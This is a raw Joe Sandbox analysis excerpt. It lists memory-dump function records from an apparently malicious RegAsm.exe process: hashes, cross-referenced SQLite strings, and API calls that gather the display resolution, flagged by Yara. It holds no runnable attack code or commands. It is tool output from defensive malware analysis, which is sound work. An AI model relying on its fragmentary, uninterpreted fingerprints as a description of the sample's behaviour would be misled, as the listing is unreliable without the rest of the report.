                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
                                                                                                                                                                                                                                                              • API String ID: 0-1499782803
                                                                                                                                                                                                                                                              • Opcode ID: 5320cca79637ea79bbcc85cb5d93d437ec448edfd32cd55e61758b6d4671bc1b
                                                                                                                                                                                                                                                              • Instruction ID: 18da0d2ea15d7719f02bff603b2841437e9e57f85cbb29f10be073f754069bbe
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5320cca79637ea79bbcc85cb5d93d437ec448edfd32cd55e61758b6d4671bc1b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7511371A043489FD700CF28CA86B1A77E8AF60654F3D446EFC49CB291E73AE849C752
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                                                                                                                                                                                                              • API String ID: 0-538076154
                                                                                                                                                                                                                                                              • Opcode ID: 1a5c25728555f5aa5846f6236cf16f092ab4a978f4df011e87a1230e9749b6a4
                                                                                                                                                                                                                                                              • Instruction ID: 7041eef4752e2a6ccd4649330c991bd68a8f27eb499dbe0250b5ca6f22a5122c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a5c25728555f5aa5846f6236cf16f092ab4a978f4df011e87a1230e9749b6a4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B631AD75404344AFF712CA689C00A9B77ADAF81329F4C052EE8D3E6141E771E6858B93
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                                                                                                                                                                                                                              • Instruction ID: 5b5716f24b432fffec80499e297cd9f017a1878265d7f2c93b09a353b8d720c6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD2194AA90039277E70A9E25DC01F7F639CAF91615F4D845CFE15A2180F724E689C2A3
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1993FB96
                                                                                                                                                                                                                                                              • API called with finalized prepared statement, xrefs: 1993FB7A
                                                                                                                                                                                                                                                              • misuse, xrefs: 1993FBA0
                                                                                                                                                                                                                                                              • API called with NULL prepared statement, xrefs: 1993FB65
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 1993FBA5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-860711957
                                                                                                                                                                                                                                                              • Opcode ID: 3613309a5981d4558168cdac070a73f9295928734c3cc053871fbfc96882b3b4
                                                                                                                                                                                                                                                              • Instruction ID: 17fae04e483ae0cc4e48dad93cfbea465685a572974fba2d79f8f97c2f49df52
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3613309a5981d4558168cdac070a73f9295928734c3cc053871fbfc96882b3b4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADB1F5B49047418FE7218F38D845B1777E8BF4531AF8C452CE8DA87282E776E609C7A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
                                                                                                                                                                                                                                                              • API String ID: 0-3324442540
                                                                                                                                                                                                                                                              • Opcode ID: 76735e1730086dbdec45c79ac1cd6ede01cd1baefae5ad89118343fbdaaeb9e6
                                                                                                                                                                                                                                                              • Instruction ID: 975a59cc4565bede58e5a1a4cf2a4958d2323ba5e4ccd76519fd7e9bcb0c917d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76735e1730086dbdec45c79ac1cd6ede01cd1baefae5ad89118343fbdaaeb9e6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5181E071A00291AFDB018F68DC44A4AB7E8FF44255F4D062DFC4AEF260D736E959CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1984ECCB
                                                                                                                                                                                                                                                              • YHI;, xrefs: 1984EB06
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 1984ECDA
                                                                                                                                                                                                                                                              • %.*s%s, xrefs: 1984EC88
                                                                                                                                                                                                                                                              • database corruption, xrefs: 1984ECD5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %.*s%s$%s at line %d of [%.10s]$YHI;$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-2376096024
                                                                                                                                                                                                                                                              • Opcode ID: 1f6181c50408ea227e90b67a250dd77491497196765a4c4c1cf8a2a8b4d6a735
                                                                                                                                                                                                                                                              • Instruction ID: 91bbf90516f76ad0204578ccf84e8df0ecb1039b1389226ff6ac38967d4a2cf1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f6181c50408ea227e90b67a250dd77491497196765a4c4c1cf8a2a8b4d6a735
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B561D075A083598BD714CF28C880B9AB7E2BF94710F2C496DE8499B3C2D735F905CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 199274C1
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 199274CD
                                                                                                                                                                                                                                                              • unable to close due to unfinalized statements or unfinished backups, xrefs: 199275D1
                                                                                                                                                                                                                                                              • invalid, xrefs: 199274BC
                                                                                                                                                                                                                                                              • misuse, xrefs: 199274D7
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 199274DC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                                              • API String ID: 0-3800776574
                                                                                                                                                                                                                                                              • Opcode ID: c6ff32c9c221744e6cae5b29db10583a25b1a8998f598cf24ee6247965bfc21a
                                                                                                                                                                                                                                                              • Instruction ID: a357813cb04a60f793385ee7538a2401c2775b3a8a0052f4b82dcc194cbd351a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6ff32c9c221744e6cae5b29db10583a25b1a8998f598cf24ee6247965bfc21a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01511475900A51ABD3128B3CAC44F5FB7ADAF40614F8D442CE899E3285E731F94AC6A3
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • PRAGMA %Q.page_size, xrefs: 198CBD03
                                                                                                                                                                                                                                                              • SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 198CBD67
                                                                                                                                                                                                                                                              • undersize RTree blobs in "%q_node", xrefs: 198CBDA1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
                                                                                                                                                                                                                                                              • API String ID: 0-3485589083
                                                                                                                                                                                                                                                              • Opcode ID: 48d274913f2b12f6b74a4e478a39aca3eba2c7ac2e844a13d9940dea6d7fa55d
                                                                                                                                                                                                                                                              • Instruction ID: 9a634cb873bc9777237b2aed814d29dd7d80fe29dbfaa932689e1adbd5c9dce5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48d274913f2b12f6b74a4e478a39aca3eba2c7ac2e844a13d9940dea6d7fa55d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C3137B1900611AFE3008F7CCC80A9673ACFB44756F0D452AFD09D2241D736ED59DBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0040EE99
                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040EEA4
                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040EEAF
                                                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0040EEBA
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,0041380E,?,00000000,?,Display Resolution: ,00000000,?,00424570,00000000,?), ref: 0040EEC6
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,0041380E,?,00000000,?,Display Resolution: ,00000000,?,00424570,00000000,?,00000000), ref: 0040EECD
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0040EEDF
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID: %dx%d
                                                                                                                                                                                                                                                              • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                                              • Opcode ID: 778560b9f76cae89f79a2f657b049482a12e78cc86ef9649c24058194cddea55
                                                                                                                                                                                                                                                              • Instruction ID: 059e9ed3bbbb0a0d148e481210e129b960f61b39bee8a3c44c7dbc2efc0f3417
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 778560b9f76cae89f79a2f657b049482a12e78cc86ef9649c24058194cddea55
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF04B71601224BBD7105BA6AD4DD9F7F6DFF4ABA1B001015FA0592250D77449128BE5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-2528248365
                                                                                                                                                                                                                                                              • Opcode ID: 0c89ec8271a3427be8b77956efe92591731361ed0fc5567fd69df9e4be88721d
                                                                                                                                                                                                                                                              • Instruction ID: b64e704a68a8b77acbf6441477158fc7d8880d24473408599fe19a08dacdec03
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c89ec8271a3427be8b77956efe92591731361ed0fc5567fd69df9e4be88721d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF158706046529FD701DF28C881AA6B7E8FF44714F9C459DE888C7285E336F95AC7A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 198529F1
                                                                                                                                                                                                                                                              • unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 19852AA0
                                                                                                                                                                                                                                                              • malformed inverted index for FTS5 table %s.%s, xrefs: 19852A8A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
